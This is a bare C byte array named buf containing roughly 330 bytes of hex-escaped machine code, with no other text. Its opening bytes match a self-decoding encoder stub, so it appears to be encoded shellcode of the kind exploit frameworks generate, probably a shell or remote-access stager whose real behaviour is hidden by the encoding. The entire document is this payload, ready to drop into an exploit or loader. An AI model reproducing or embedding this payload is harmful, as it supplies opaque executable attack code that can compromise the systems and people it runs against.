unsigned char buf[] = 
"\xd9\xe5\xd9\x74\x24\xf4\xbd\xcc\xb1\xe3\x49\x5b\x29\xc9\xb1"
"\x31\x83\xc3\x04\x31\x6b\x14\x03\x6b\xd8\x53\x16\xb5\x08\x11"
"\xd9\x46\xc8\x76\x53\xa3\xf9\xb6\x07\xa7\xa9\x06\x43\xe5\x45"
"\xec\x01\x1e\xde\x80\x8d\x11\x57\x2e\xe8\x1c\x68\x03\xc8\x3f"
"\xea\x5e\x1d\xe0\xd3\x90\x50\xe1\x14\xcc\x99\xb3\xcd\x9a\x0c"
"\x24\x7a\xd6\x8c\xcf\x30\xf6\x94\x2c\x80\xf9\xb5\xe2\x9b\xa3"
"\x15\x04\x48\xd8\x1f\x1e\x8d\xe5\xd6\x95\x65\x91\xe8\x7f\xb4"
"\x5a\x46\xbe\x79\xa9\x96\x86\xbd\x52\xed\xfe\xbe\xef\xf6\xc4"
"\xbd\x2b\x72\xdf\x65\xbf\x24\x3b\x94\x6c\xb2\xc8\x9a\xd9\xb0"
"\x97\xbe\xdc\x15\xac\xba\x55\x98\x63\x4b\x2d\xbf\xa7\x10\xf5"
"\xde\xfe\xfc\x58\xde\xe1\x5f\x04\x7a\x69\x4d\x51\xf7\x30\x1b"
"\xa4\x85\x4e\x69\xa6\x95\x50\xdd\xcf\xa4\xdb\xb2\x88\x38\x0e"
"\xf7\x67\x73\x13\x51\xe0\xda\xc1\xe0\x6d\xdd\x3f\x26\x88\x5e"
"\xca\xd6\x6f\x7e\xbf\xd3\x34\x38\x53\xa9\x25\xad\x53\x1e\x45"
"\xe4\x37\xc1\xd5\x64\x96\x64\x5e\x0e\xe6";
